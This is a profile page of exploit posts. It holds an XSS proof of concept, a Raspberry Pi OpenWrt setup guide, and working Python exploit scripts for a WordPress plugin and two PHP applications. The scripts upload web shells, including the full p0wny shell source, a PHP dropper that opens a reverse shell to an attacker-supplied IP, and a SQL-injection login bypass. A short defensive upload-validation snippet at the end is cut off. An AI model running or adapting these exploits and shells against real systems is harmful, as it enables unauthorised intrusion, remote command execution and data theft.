
Everything posted by HireHackking
-
Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)
# Date: 07 July 2021
# Exploit Author: Subhadip Nag (mrl0s3r)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
# Tested on: Server: XAMPP

# Description #
Employee Record Management System 1.2 is vulnerable to stored cross site scripting (xss) in the Edit My Education because of insufficient user supplied data.

# Proof of Concept (PoC) : Exploit #
1) Go to: http://localhost/ERMSP/erms/loginerms.php
2) Login: Log in as a User (given username and password)
3) Go to Edit My Education and Edit My Exp
4) Enter the payload: <script>alert(1)</script>
5) Click Update
6) Go to the 'My Education' option
7) Our XSS attack is successful

# PoC image
1) https://ibb.co/LS78xjX
2) https://ibb.co/9G0Pbxb
-
Title: Raspberry Pi 4B build OpenWrt soft routing—configure server
In this article, we will take a look at OpenWrt based on the Raspberry Pi 4B. OpenWrt is a famous router management system. It is used by many manufacturers due to its open source and third-party compilation advantages. I happened to have a Raspberry Pi 4B on hand, and I flashed OpenWrt to do soft routing. At the same time, I tried to add various plugins to it.

Accessories Preparation
Raspberry Pi 4B development board
32G memory card
one network cable

Select firmware
Here I am using Lean's Raspberry Pi OpenWrt firmware. Author's project address: https://github.com/coolsnowwolf/openwrt

Flash firmware
Open the tool win32, select the firmware and disk location as follows, and click Write. After the write is successful, insert the card into the Raspberry Pi. Start the Raspberry Pi.

Log in to the background
Connect the Raspberry Pi's network port to your computer with a network cable, and then enter 192.168.1.1 in the browser. If the connection is fine, it will jump directly to the OpenWrt background interface.
Default username: root
Default login password: password

Add interface
Add a wan port, the protocol is DHCP client, and check the Ethernet adapter eth0 in the physical settings.

The Advantages of OpenWrt
The difference between OpenWrt and other firmware is that it can install many plug-ins, such as advertising blocking, cloud disk download acceleration, etc.

Network storage
Of course, we can also use Nginx and PHP environments on the router. In other words, we can build the router into a small server.

Configure ssh
Why can't you log in to ssh for your own things? Many router firmwares cannot be logged in to with ssh, while OpenWrt is very simple.

Log in ssh

Build a blog
Modify the nginx configuration file:

    user root root;                  # workers run as root here; a dedicated unprivileged user is the usual choice
    worker_processes 1;
    pid /var/run/nginx_kodexplorer.pid;

    events {
        worker_connections 1024;
    }

    http {
        include /etc/nginx/mime.types;
        sendfile on;
        keepalive_timeout 65;

        server {
            listen 8081;
            server_name localhost;

            location / {
                root /mnt/www/;
                index index.html index.htm index.php;
            }

            error_page 500 502 503 504 /50x.html;
            location = /50x.html {
                root html;
            }

            location ~ \.php$ {
                root /mnt/www/;
                try_files $uri =404;                    # PHP file does not exist: return 404 instead of passing a guessed path to PHP
                fastcgi_pass unix:/var/run/php7-fpm.sock;   # Execute PHP through Unix sockets
                fastcgi_index index.php;
                fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;   # Fix Nginx fastcgi vulnerability
                include /etc/nginx/fastcgi_params;
            }
        }
    }

Test probe file

Installing typecho

In this way, an inconspicuous router is built into a server.
-
Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated) # Date 07.07.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://smartypantsplugins.com/ # Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip # Version: Before 4.22 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24347 # CWE: CWE-434 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24347/README.md ''' Description: The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension's case, for example, from "php" to "pHP". ''' ''' Banner: ''' banner = """ ______ _______ ____ ___ ____ _ ____ _ _ _____ _ _ _____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || ||___ /| || |___ | | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_ |_ \| || |_ / / | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _|__) |__ _/ / \____| \_/ |_____| |_____|\___/_____|_| |_____| |_||____/ |_|/_/ * Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated) * @Hacker5preme """ print(banner) ''' Import required modules: ''' import requests import argparse ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD 
print('') print('[*] Starting Exploit:') print('') ''' Authentication: ''' session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } # Authenticate: print('') auth = session.post(auth_url, headers=header, data=body) auth_header = auth.headers['Set-Cookie'] if 'wordpress_logged_in' in auth_header: print('[+] Authentication successfull !') else: print('[-] Authentication failed !') exit() ''' Retrieve User ID from the widget: ''' user_id_text = session.get('http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview').text search_string = "<form><select name='user_uid' id='user_uid' class=''>" user_string = ">" + username user_id_text = user_id_text[user_id_text.find(search_string):] user_id_text = user_id_text[user_id_text.find(user_string) - 2: user_id_text.find(user_string)] user_id = user_id_text.replace("'", '') ''' Exploit: ''' exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview&id=' + user_id # Header (Exploit): Header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": exploit_url, "Content-Type": "multipart/form-data; 
boundary=---------------------------37032792112149247252673711332", "Origin": "http://" + target_ip, "Connection": "close", "Upgrade-Insecure-Requests": "1" } # Web Shell payload (p0wny shell): https://github.com/flozz/p0wny-shell shell_payload = "-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\r\n\r\na1b3bac1bc\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-name\"\r\n\r\nExploits\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"shell.pHP\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash 
-c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n 
max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n 
eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? 
currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n 
_updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event 
|| window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\r\n\r\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\r\n\r\nUpload\r\n-----------------------------37032792112149247252673711332--\r\n" # Exploit: session.post(exploit_url, headers=header, data=shell_payload) print('') print('[+] Exploit done !') print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/sp-client-document-manager/' + user_id + '/shell.php') print('')
-
Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)
# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)
# Date: 2021-07-07
# Exploit Author: faisalfs10x
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP

"""
################
# Description  #
################

1. The admin panel UI login can be accessed at http://{ip}/scheduler/admin/login.php. Due to the client-side input validation implemented within scripts, it is possible to bypass it and access the admin panel UI by making a request to "http://localhost/scheduler/admin/?page=user" and removing the javascript tag '<script>location.href="http://localhost/scheduler/admin/login.php"</script>' from the server response body. To make the process easier, we can use Burp's "Match and Replace" option to automatically replace the javascript tag parts of response bodies passing through the proxy.

2. The admin panel has an upload function for the profile photo, accessible at http://localhost/scheduler/admin/?page=user. An attacker could upload a malicious file such as shell.php with Content-Type: image/png. Then, the attacker has to visit the uploaded profile photo to access the shell.

#####################
# PoC for webshell  #
#####################

Request:
========

POST /scheduler/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 721
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYrg9YZykFY2bmNqY
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/scheduler/admin/?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=a5d66tonur7vir28rtoc049127
Connection: close

------WebKitFormBoundaryYrg9YZykFY2bmNqY
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundaryYrg9YZykFY2bmNqY
Content-Disposition: form-data; name="firstname"

Adminstrator
------WebKitFormBoundaryYrg9YZykFY2bmNqY
Content-Disposition: form-data; name="lastname"

Admin
------WebKitFormBoundaryYrg9YZykFY2bmNqY
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryYrg9YZykFY2bmNqY
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryYrg9YZykFY2bmNqY
Content-Disposition: form-data; name="img"; filename="rev.php"
Content-Type: image/png

<?php echo "output: ";system($_GET['rev']); ?>   # shell content here
------WebKitFormBoundaryYrg9YZykFY2bmNqY--

####################
# Webshell access: #
####################

# Webshell access via:
PoC: http://localhost/scheduler/uploads/{random_number}_rev.php?rev=whoami

# Output:
output: windows10/user
"""

##################################################
# Reverse shell exploit code for windows target: #
##################################################

#!/usr/bin/python

import requests
import sys
import string
import random
import urllib.request
from requests_html import HTMLSession

if len(sys.argv) < 4:
    print('\033[1;32;40m [+] Usage: python3 '+sys.argv[0]+' <target_ip> <attacker_ip> <attacker_port>')
    exit()

RHOST = sys.argv[1]
RPORT = '80'
LHOST = sys.argv[2]
LPORT = sys.argv[3]

if not RHOST.startswith('http://') and not RHOST.startswith('https://'):
    RHOST = "http://" + RHOST

# if not RHOST.endswith('/'):
#     RHOST = RHOST + "/"

# RHOST = '127.0.0.1'
# RPORT = '80'
# LHOST = '192.168.8.117'
# LPORT = '4444'

shellpath = f"{RHOST}:{RPORT}/scheduler/uploads/"  # shell will be uploaded here
let = string.ascii_lowercase
shellfilename = ''.join(random.choice(let) for i in range(5))+".php"  # or just static shellfilename = 'rev.php'
req_url = f"{RHOST}:{RPORT}/scheduler/classes/Users.php?f=save"  # endpoint for uploading shell

req_headers = {"sec-ch-ua": "\"Chromium\";v=\"91\", \" Not;A Brand\";v=\"99\"",
               "Accept": "*/*",
               "X-Requested-With": "XMLHttpRequest",
               "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
               "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryYrg9YZykFY2bmNqY",
               "Accept-Language": "en-US,en;q=0.9",
               "Connection": "close"}

# multipart body: the "img" part carries the PHP dropper with a forged image/png Content-Type
req_data = "------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellfilename+"\"\r\nContent-Type: image/png\r\n\r\n<?php\r\n\r\nheader('Content-type: text/plain');\r\n$ip = \""+LHOST+"\"; \r\n$port = \""+LPORT+"\"; \r\n$payload = \"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\";\r\n$evalCode = gzinflate(base64_decode($payload));\r\n$evalArguments = \" \".$port.\" \".$ip;\r\n$tmpdir =\"C:\\\\windows\\\\temp\";\r\nchdir($tmpdir);\r\n$res .= \"Using dir : \".$tmpdir;\r\n$filename = \"rev.exe\";\r\n$file = fopen($filename, 'wb');\r\nfwrite($file, $evalCode);\r\nfclose($file);\r\n$path = $filename;\r\n$cmd = $path.$evalArguments;\r\n$res .= \"\\n\\nExecuting : \".$cmd.\"\\n\";\r\necho $res;\r\n$output = system($cmd);\r\n\t\t\t\r\n?>\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY--\r\n"

print("\033[1;33;40m Uploading shell...")
out = requests.post(req_url, headers=req_headers, data=req_data, verify=False)
print("\033[1;31;40m Uploaded shell will be available at "+shellpath+"")
print(" Enjoy!")

# finding the uploaded shell
session = HTMLSession()
r = session.get(shellpath)
sel = 'a[href*="'+shellfilename+'"]'
find_shellfilename = r.html.find(sel)

# popping up the shell :p
for shellname in find_shellfilename:
    try:
        url = shellname.absolute_links.pop()
        print("\033[1;33;40m Shell is available at "+url+"")
        response = urllib.request.urlopen(url)
        print(" Byeee!")
    except KeyboardInterrupt:
        exit('User aborted!')
-
Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE
# Exploit Title: Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE
# Date: 05-07-2021
# Exploit Author: Eleonora Guardini (eleguardini93 at gmail dot com or eleonora.guardini at dedagroup dot com)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested On: Ubuntu 18.04 with apache2 2.4.29 (Ubuntu)

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import random
import os, sys
import optparse
import string

if len(sys.argv) != 5:
    print('Usage: -u http://<ip> -c <"command">')
    print('ex. python3 ' + sys.argv[0] + ' -u http://192.168.1.2 -c "ls+-la"')
    exit()

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url")
parser.add_option('-c', '--cmd', action="store", dest="cmd")
options, args = parser.parse_args()
print(options.url, options.cmd)
print(len(sys.argv))

def randomGen(size=8, chars=string.ascii_lowercase):
    return ''.join(random.choice(chars) for _ in range(size))

urlbase = options.url + '/cman/admin'
loginUrl = urlbase + '/index.php'
shellFile = randomGen() + ".php"

# SQL injection in the admin login form bypasses authentication
payload = {"username": "test", "password": "' or 'a'='a'#", "login": ""}
proxies = {"http": "http://localhost:8080"}  # optional: route through a local Burp proxy

# the profile-picture endpoint accepts a PHP file as the "image" field
mp_encoder = MultipartEncoder(fields={
    "image": (shellFile, "<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>", "application/x-php"),
    "change": ""})

session = requests.Session()
r = session.post(loginUrl, payload, allow_redirects=False)  # , proxies=proxies)
cookie = r.headers["Set-Cookie"]
headers = {"Cookie": cookie, 'Content-Type': mp_encoder.content_type}
uploadUrl = urlbase + "/admin_pic.php"
post = session.post(uploadUrl, data=mp_encoder, allow_redirects=False, headers=headers)  # , proxies=proxies)
os.system("curl " + urlbase + "/uploads/" + shellFile + "?cmd=" + options.cmd)
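The three file-upload findings above (the SP Project &amp; Document Manager case-change bypass, the Scheduler profile-photo upload with a forged Content-Type, and the Church Management System picture upload) all come down to the same missing server-side check. The Python below is an editor-added illustration, not code from any of those projects or advisories: flawed_denylist_allows reproduces the case-sensitive denylist pattern the CVE-2021-24347 description attributes to the plugin (a reconstruction, not the plugin's source), and validate_upload is the hardened form, with a case-insensitive extension allowlist, a magic-byte check that ignores the client's Content-Type, and a server-generated filename. The function names, the Decision type and the sample byte strings are constructed for the example.

```python
"""Upload validation, as an added illustration: the case-sensitive denylist
pattern described for CVE-2021-24347 next to a hardened allowlist check.
Editor's example code; not taken from any project on this page."""
import os
import secrets
from dataclasses import dataclass
from typing import Optional

# Extensions the endpoint is meant to accept, each with the magic bytes
# a genuine file of that type begins with.
ALLOWED = {
    ".png":  [b"\x89PNG\r\n\x1a\n"],
    ".jpg":  [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif":  [b"GIF87a", b"GIF89a"],
}


def flawed_denylist_allows(filename: str) -> bool:
    """Reconstruction of the weak pattern the advisory describes (not the
    plugin's actual source): a case-sensitive denylist on the extension.
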